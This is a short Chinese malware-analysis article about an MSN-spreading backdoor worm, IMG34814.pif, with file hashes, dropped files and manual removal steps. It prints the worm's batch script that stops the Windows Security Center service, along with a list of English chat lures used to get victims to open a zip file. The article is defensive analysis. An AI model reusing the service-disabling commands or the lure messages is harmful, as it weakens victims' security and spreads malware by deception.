扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
作者:zdnet安全频道 来源:论坛整理 2008年6月20日
关键字: IMG34814.pif 蠕虫 msn
文件名称:IMG34814.pif
文件大小:141824 byte
AV命名:Trojan.Win32.Delf.ads(卡吧斯基)
加壳方式:无
编写语言:Borland Delphi 6.0 - 7.0
病毒类型:后门
文件MD5:ef2e009208e0efef05d149ee06388dd3
文件SHA1:45E43FB7BD4EB62D524927F5BE71240A74C9BB6B
传播方式:MSN。
行为分析:
1、释放病毒文件:
%Windir%\msnmsg.exe 41824 字节
%Windir%\pic.zip 141946 字节(压缩包)
%Windir%为:C:\Winnt(2000、ME系统) C:\Windows(XP、2003)
2、释放P处理:c:\a.bat
内容:
@echo off
net stop "Security Center"
net stop winvnc4
del c:\a.bat
启动CMD,并调用Net Stop尝试禁用下面服务:
Security Center(安全中心) winvnc4(远控)
SSM日志:
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:"C:\winnt\system32\net.exe" stop "Security Center"
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:net stop winv.nc4
3、无判断方式尝试启动msnmsgr.exe
日志;
Parent process:
Path: C:\WINNT\system32\svchost.exe
PID: 404
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Child process:
Path: C:\Program Files\MSN Messenger\msnmsgr.exe
Information: MSN Messenger (Microsoft Corporation)
Command line:"C:\Program Files\MSN Messenger\msnmsgr.exe" -Embedding
4、假冒的msnmsgr.exe(C:\Windows\msnmsgr.exe)驻进程,连接213.232.92.1**,并开启1863端口。
(汗,很逼真,按IP显示,可能是英国的IRC服务器,不过未见其他行为)
5、检测MSN聊天窗口,并随机出现下列对话和pic.zip 压缩包:
Hey :-), I just took this picture, sexy isnt it :-P?
What do you think of my photo editing skills?
Which one do you like in this pic, the black one or the blue one?
This is what happens when you eat to many chips :-P
Look what i made out of cans!! haah :-P!
:-p this was halarious at that party a while back
Hey I have a new pic, what do ya think?
Check this out this pic is so freaking cool
Hahahaha, do you remember this picture?
:-O Check this out! Nearly laughed my ass off!!
hey wats up.. have you seen this pic of .harry potter?
(未证实)
解决方法:
先去试下MSN蠕虫专杀,看能不能杀~~
手工清除:
下载SREng
http://www.kztechs.com/sreng/download.html
1、断开网络,关闭不需要的进程。
2、打开任务管理器,结束msnmsgr.exe进程(有几个关几个``)
3、打开SREng,删除:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<Microsoft Genuine Logon><msnmsg.exe> []
4、删除:
%Windir%\msnmsg.exe 41824 字节(注意路径)
%Windir%\pic.zip 141946 字节(压缩包)
%Windir%为:C:\Winnt(2000、ME系统) C:\Windows(XP、2003)
PS:如果无法结束msnmsgr.exe进程的话,可以忽略,先清理注册表,重启后再删除msnmsg.exe。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。